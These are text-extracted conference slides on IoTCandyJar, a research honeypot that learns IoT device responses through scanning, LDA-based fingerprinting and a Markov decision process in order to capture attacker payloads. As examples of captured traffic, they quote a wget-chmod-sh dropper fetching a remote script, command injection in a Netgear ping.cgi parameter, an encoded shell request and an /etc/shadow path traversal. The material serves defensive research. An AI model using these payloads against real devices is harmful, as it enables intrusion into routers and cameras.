34
IoTCandyJar: Towards an Intelligent- Interaction Honeypot for IoT Devices
IoTCandyJar:TowardsanIntelligent-InteractionHoneypotforIoTDevices
Bio• BlackHatVeteran(2016USA,2017Asia,2017USA).• VirusBulletin(2016,2017)• PrincipleSecurityResearcher@PANW.
MobileSecurity- DiscoverMalware- AndroidSecurity
WebSecurity- ExploitKitDetection.- BrowserSecurity.
Explore&Exploit- Fuzzing&CVEs.- Attacks.
IoTSecurity- Vulnerability.- SDN-basedSolution.
Agenda
• IoTHoneypot.• IntelligentInteraction.• IoTScanner• IoT-ID• IoTLearner
Theideaofhoneypotsbeganin1991.
IoTHoneypot
IoTHoneypot
Low-Interaction
High-Interaction
• Very limited level of interaction• ManuallyGenerateResponses• honeyd
• Fullyedgedoperatingsystem• Interactwithrealsystem(physical)oremulator (virtual)• GenIII
ChallengestoBuildIoT-Honeypot
Low-InteractionIoTHoneypot?
HeterogeneityLackofemulator
High-InteractionIoTHoneypot?
LackofKnowledgeExpensive
Intelligent-Interaction
SimulateBehaviors
AutomaticCollect IoTBehaviors Expectedbyattackers
IntelligentlyLearn ThroughInteraction
WhyInteraction?
{ip}:443/img/favicon.png?v=6.0.1-1213
Attack
wget http://x.x.x.x/mal.sh; chmod 777 mal.sh; sh mal.sh;
Request Content
Request Content
MaliciousServerAddress
CVE-2016-6433
404NotFound
200OK
HONEYPOT
401Unauthorized
404NotFound
200OK
ZyXEL Modem/globe
WWW-Authenticate:Basicrealm=
"NETGEARR7000”HEAD/HTTP/1.1
/etc/RT2870STA.dat IPCameraInfo/Config
CapturedPre-AttackCheck
getstatus.cgi
…
home_wan.htm
ManagementComponentTransport(MCTP)
REMOTEHI_SRDK_MEDIA_GetShowAttr
MCTP/1.0
HNAP
UDP Port53413
\x00\x00 \x00 \x00\x00 \x00\x00\x00 \xD0\xA5Login: VulnerableRouter
(Netcore|Netis)
VulnerableKguardDVR
/HNAP1/ VulnerableRouter(Netgear|Linksys)
MCTP/1.0200OK
IoTProtocols
EchoCommand
POST /ping.cgi HTTP/1.1referer:http://x.x.x.x/DIAG_diag.htm
IPAddr1=1&IPAddr2=2&IPAddr3=3&IPAddr4=4&ping=Ping&ping_IPAddr=12.12.12.12;
Netgear DGN2200v1-v4
… ... ... ...… ... ... ...
… ... ... ...… ... ... ...
InjectEchoCommandtoPrintRandomStringandCheckResultinResponse
echo "zP8ZDXwQCC";
zP8ZDXwQCC
HoneypotInstance
HoneypotInstance
SessionTable
IoTDatabase
HoneypotInstance
LearningModel
SystemArchitecture
Raw_Request1
IoTScanner
ActiveProbing
Filter2
IoTLearner
MDP
IoT-ID
3
Raw_Response
IoTScanner
AutomaticIoTBehaviorsCollector
CustomizedScanningForIoTDevices
• IPFiltering
• Port Filtering
• RequestFiltering
• ExploitFiltering
IPAddressFiltering
MASSCAN
PortsFiltering
PrioritizetoScanTrafficonThesePorts.
CapturedHoneypotTraffic(Request)
18Mà1Mà0.4M
RequestFiltering
RequestTypeByPort
ExploitRequestFiltering
RemoteCommandExecution(RCE).
UPnP
TR-069SOAP
/shell?%75%6E%61%6D%65%20%2D%61
Encoded
InfoDisclosure.
IdentifyShellCode
PathTransversal
InformationLeaking
../../../../etc/shadow
ScanningResult
• 300Threads• 3 sectimeout• Reusetcp session
IOT-ID:PINPOINTIOTDEVICE
IoT-ID
•Problem:Patternmatchbasedapproachisnotenough.• Example:
• ControversialResult.• IPchange.
•Goal:• ObtainaccurateknowledgeofIoTdevice.• PinpointwithIoT-ID.
•Approach:• LDA-basedSolution.
LDA-BasedSolution
• LDA• Documents,Terms,Topics.• Doc=mixtureoftopics
• ProblemFormulation• Treateachresponseasadocument• TypeoftheIoTdeviceasthetopic
• Example:• HTTPtrafficfrom6differentroutervendors.• Summarize15differenttopicsforthem.
IoTLearner
LearningBehaviorsFromInteractions.
StateLocator
SelectResp
Selector(Model+Algorithm)
SessionTable
RawRequest
RawResponse
Req_RspMapping
feedback
RandomResponding
ScanningResultforURL/HNAP1/
404NotFound(SonicWALLFW)
401Unauthorized(TRENDnet Router)
<ModelName>WRT110
</ModelName>(LinkSys)
<ModelName>DIR-615B2
</ModelName>(D-Link)
KnowledgeDatabase
/HNAP1/
RandomlySelectOne
SessionTable
<Req,Rsp,IP,Port,Proto>
Reply
AccumulateBehaviorsKnowledgeFromAttacker’sReaction
(FollowingRequest)
ProblemFormulation
• Decisionepochs(t)• States(x,s)• Actions(a)• Transitionsprobabilities(T)• Rewards(r)
• Whenwereceivearequest• CurrentIncomingRequest• PotentialResponseSet• Pr(NextRequest)• CaptureMaliciousPayload.
SequentialDecisionMaking SelecttheBestResponseastheactiontosatisfyattackersandcapturethemaliciouspayload.
MDPBuild
SessionTable ScanningResponses
404NotFound(SonicWALLFW)
401Unauthorized(TRENDnet)
<ModelName>WRT110
</ModelName>(LinkSys)
<ModelName>DIR-615B2
</ModelName>(D-Link)
RSP1
RSP2
RSP3
RSP4
Req_ID Rsp_ID Session_ID
0 1 0
0 2 1
0 2 2
0 2 2
0 3 3
1 0 3
… … …
/HNAP1/
Terminated
/ping.cgishellcmd
RSP3
RSP1
RSP2
RSP2
0.9
0.1
1
SOAPAction:GetDeviceSettingsshellcmd
RSP4
0.8
1
RSP3
0.2
• RealCaseisMoreComplex.• CGI-Script.• EntryPoints.
• PrivilegedCGI– MediumReward.• ExploitRequest– HighReward.
SessionImprovement
• RandomResponseSelectionAlgorithm• Occasionallyselectthecorrectone.
• MDPResponseSelectionAlgorithm• selectthecorrectonewithhigherprobability.
ThreeTakeaways
•ChallengestobuildIoThoneypotusingtraditionalways.
•UtilizinganautomaticandintelligentwaytobuildIoThoneypot.
•Interestingpre-attackchecksandExploitationsonIoTDevice.
Q&A
/img/favicon.png?v=6.0.1-1213
200OK
Terminated
404
/
302Doc
moved
varpassword=“…”
xxx
/apply.cgishell
+10
/rulesimport.cgishell
+10
Username:xxPassword:xx
/login.cgi +2
/view.cgi+2
/loginpserr.stm+1
+0.5
-10
-5
SessionTable
ScanningResponses404NotFound
(SonicWALLFW)
401Unauthorized(TRENDnet)
<ModelName>WRT110
</ModelName>(LinkSys)
<ModelName>DIR-615B2
</ModelName>(D-Link)
RSP1 RSP2
Req_ID Rsp_ID Session_ID
0 1 0
0 2 1
0 2 2
0 2 2
0 3 3
1 0 3
… … …
/HNAP1/
Terminated
/ping.cgishellcmd
RSP3
RSP1
RSP2
RSP2
0.9
0.1
1
SOAPAction:GetDeviceSettingsshellcmd
RSP4
0.8
1
RSP3
0.2
RSP3 RSP4
